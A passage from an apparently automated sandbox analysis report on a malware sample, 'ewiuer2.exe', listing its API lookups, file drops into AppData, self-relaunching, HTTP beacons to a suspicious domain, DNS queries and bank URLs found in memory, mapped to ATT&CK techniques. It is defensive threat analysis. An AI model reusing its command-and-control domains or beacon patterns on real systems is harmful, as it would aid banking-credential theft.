\"GetProcAddress\" with a parameter RegDeleteValueW (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter DnsGetProxyInformation (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateSecurityManager (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateZoneManager (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoW (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoExW (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter DhcpRequestParams (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyW (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ConvertInterfaceGuidToLuid (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetIpForwardTable2 (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetIpNetEntry2 (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FreeMibTable (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter StringFromIID (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoSetProxyBlanket (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ObjectStublessClient10 (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter QueryActCtxW (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleExW (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CreateActCtxW (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ActivateActCtx (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FindActCtxSectionStringW (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter DeactivateActCtx (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter getaddrinfo (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter getnameinfo (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WSASocketA (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WSASend (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WSARecv (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WSAGetOverlappedResult (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WinHttpCreateProxyResolver (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EventActivityIdControl (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter NotifyIpInterfaceChange (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter NotifyUnicastIpAddressChange (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter SHGetValueA (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegSetValueExW (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueW (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter DnsGetProxyInformation (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateSecurityManager (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateZoneManager (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoW (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoExW (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter DhcpRequestParams (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyW (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ConvertInterfaceGuidToLuid (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetIpForwardTable2 (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetIpNetEntry2 (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FreeMibTable (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter StringFromIID (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoSetProxyBlanket (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ObjectStublessClient10 (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter QueryActCtxW (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleExW (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CreateActCtxW (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ActivateActCtx (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FindActCtxSectionStringW (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter DeactivateActCtx (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter getaddrinfo (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter getnameinfo (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WSASocketA (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WSASend (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WSARecv (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FreeAddrInfoExW (UID: 00000000-00003644)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03ee168@advapi32.DLL\"\n \"0e000f00703fe168@advapi32.DLL\"\n \"0e000f00cc3fe168@advapi32.DLL\"\n \"11001200b447e168@advapi32.DLL\"\n \"110012004848e168@advapi32.DLL\"\n \"120013008c48e168@advapi32.DLL\"\n \"12001300e448e168@advapi32.DLL\"\n \"14001500386ee168@advapi32.DLL\"\n \"14001500506ee168@advapi32.DLL\"\n \"14001500686ee168@advapi32.DLL\"\n \"17001800806ee168@advapi32.DLL\"\n \"0d000e00986ee168@advapi32.DLL\"\n \"11001200a86ee168@advapi32.DLL\"\n \"11001200bc6ee168@advapi32.DLL\"\n \"0d000e004466e168@WININET.dll\"\n \"0d000e00b466e168@WININET.dll\"\n \"10001100ec66e168@WININET.dll\"\n \"100011009067e168@WININET.dll\"\n \"10001100006fe168@WININET.dll\"\n \"10001100146fe168@WININET.dll\"\n \"14001500286fe168@WININET.dll\"\n \"14001500406fe168@WININET.dll\"\n \"12001300586fe168@WININET.dll\"\n \"120013006c6fe168@WININET.dll\"\n \"10001100d067e168@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Local (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\Microsoft\\Windows\\Cookies (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\History (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Local (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\Microsoft\\Windows\\Cookies (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\History (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Local (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\Microsoft\\Windows\\Cookies (UID: 00000000-00003644)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"ewiuer2.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\System32\\ewiuer2.exe\" - (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\System32\\ewiuer2.exe /nomove\" - (UID: 00000000-00006088)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:80\"\n \"<IPv4>:80\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-2", "type": 7, "relevance": 5, "name": "GETs files from a webserver", "description": "\"GET /198/383.html HTTP/1.1\nFrom: 133833031401516551\nVia: emohgso\\sgt>558`apfc>7\\qcpbo;22.1213`mt?423/_mcz?0g7_:;b1d23;a2g3746b:_ddbbc/9hd4\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:12:29 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......\n \"GET /605/309.html HTTP/1.1\nFrom: 133833061259316839\nVia: fnpihtp]thu?669abqgd?8]rdqcp<33/2324anu@5340`nd{@15h48h`h<833277aff43d226a5<22543\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:12:43 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......\n \"GET /745/727.html HTTP/1.1\nFrom: 133833061259316839\nVia: fnpihtp]thu?669abqgd?8]rdqcp<43/2324anu@5340`nd{@ee677982<d98c5ia8;bef66952d`e45f\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:12:55 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......\n \"GET /629/272.html HTTP/1.1\nFrom: 133833061259316839\nVia: mndaqgy<5:6`rr?9034]mhx?7`47`3f6e6a74dh56748hi6hi49h5;eb\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:13:24 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......\n \"GET /81/874.html HTTP/1.1\nFrom: 133833061259316839\nVia: mndaqgy<5:6`rr?9034]mhx?:ef41:32heaef6f;2;gcci7didf;1f58`qneuxrw\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:13:36 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......\n \"GET /913/906.html HTTP/1.1\nFrom: 133833061259316839\nVia: mndaqgy<5:6`rr?9034]mhx?6/d467:c7:`:e0d86:g1c5`g468:e;ea`qneuxrw\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:13:47 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......\n \"GET /238/455.html HTTP/1.1\nFrom: 133833061259316839\nVia: mndaqgy<5:6`rr?9034]mhx?<77e7f7de;e;g`39b3h/;i26i1396791`qneuxrw\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:13:59 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......\n \"GET /396/104.html HTTP/1.1\nFrom: 133833061259316839\nVia: mndaqgy<5:6`rr?9034]mhx?47675gf15ic765e4bdiec6bd3d632g:/`qneuxrw\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:14:11 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......\n \"GET /904/267.html HTTP/1.1\nFrom: 133833061259316839\nVia: mndaqgy<5:6`rr?9034]mhx?6c:de;h07fd8657f475d2577<39864i6`qneuxrw\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:14:22 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......\n \"GET /245/114.html HTTP/1.1\nFrom: 133833061259316839\nVia: mndaqgy<5:6`rr?9034]mhx?d`9e68:bg<03416;2;i`9ie66ch<27fe`qneuxrw\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:14:34 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......\n \"GET /845/914.html HTTP/1.1\nFrom: 133833061259316839\nVia: mndaqgy<5:6`rr?9034]mhx?:74<73553<13f/448f;6:g6fd`4da96a`qneuxrw\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:14:46 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......\n \"GET /350/559.html HTTP/1.1\nFrom: 133833061259316839\nVia: mndaqgy<5:6`rr?9034]mhx?i24ia94028bfebh4e6e88:3e7b:hcfh3`qneuxrw\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:14:57 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......\n \"GET /184/340.html HTTP/1.1\nFrom: 133833061259316839\nVia: mndaqgy<5:6`rr?9034]mhx?8bc865he4;3h82hicf629d55d/f;58de`qneuxrw\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:15:09 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......\n \"GET /458/753.html HTTP/1.1\nFrom: 133833061259316839\nVia: mndaqgy<5:6`rr?9034]mhx?7258chfa3g8836:gbc7/39/6g6;:a4:c`qneuxrw\nHost: mkkuei4kdsz.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 200 OK\ncontent-type: text/html\ndate: Thu\n 06 Feb 2025 09:15:21 GMT\ncontent-length: 114 with response body ==>3C21444F43545950452068746D6C3E3C68746D6C3E3C686561643E3C7363726970743E77696E646F772E6F6E6C6F61643D66756E6374696F6E28297B77696E64.......", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-0", "type": 7, "relevance": 1, "name": "Contacts domains", "description": "\"mkkuei4kdsz.com\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"mkkuei4kdsz.com\"\n \"ow5dirasuek.com\"\n \"podayl.net\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2\" has an executable section named \".text\"\n \"ewiuer2.exe\" has an executable section named \".text\"\n \"EWIUER2.EXE.67A4889D.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2\" has an writable section named \".data\"\n \"ewiuer2.exe\" has an writable section named \".data\"\n \"EWIUER2.EXE.67A4889D.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-23", "type": 2, "relevance": 2, "name": "Detected known bank URL artifact", "description": "\"www.credit-agricole.fr\" (Source: 00000000-00003644.00000000.69782.00280000.00000004.mdmp, 00000000-00003644.00000001.71706.00280000.00000004.mdmp, 00000000-00003644.00000002.73626.00280000.00000004.mdmp, Indicator: \"credit-agricole.fr\")\n \"capitalone.com\" (Source: 00000000-00003644.00000000.69782.00280000.00000004.mdmp, 00000000-00003644.00000001.71706.00280000.00000004.mdmp, 00000000-00003644.00000002.73626.00280000.00000004.mdmp, Indicator: \"capitalone.com\")\n \"www.credit-agricole.fr\" (Source: 00000000-00005912.00000000.66141.00150000.00000004.mdmp, 00000000-00005912.00000001.66888.00150000.00000004.mdmp, Indicator: \"credit-agricole.fr\")\n \"capitalone.com\" (Source: 00000000-00005912.00000000.66141.00150000.00000004.mdmp, 00000000-00005912.00000001.66888.001BD000.00000004.mdmp, Indicator: \"capitalone.com\")\n \"www.credit-agricole.fr\" (Source: 00000000-00006088.00000000.67187.00240000.00000004.mdmp, 00000000-00006088.00000001.69110.00240000.00000004.mdmp, 00000000-00006088.00000002.69465.00240000.00000004.mdmp, Indicator: \"credit-agricole.fr\")\n \"capitalone.com\" (Source: 00000000-00006088.00000000.67187.00240000.00000004.mdmp, 00000000-00006088.00000001.69110.00240000.00000004.mdmp, 00000000-00006088.00000002.69465.00240000.00000004.mdmp, Indicator: \"capitalone.com\")", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"ewiuer2.exe\" - Location: [%APPDATA%\\ewiuer2.exe]- [targetUID: 00000000-00005716]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" trying to access non-existent 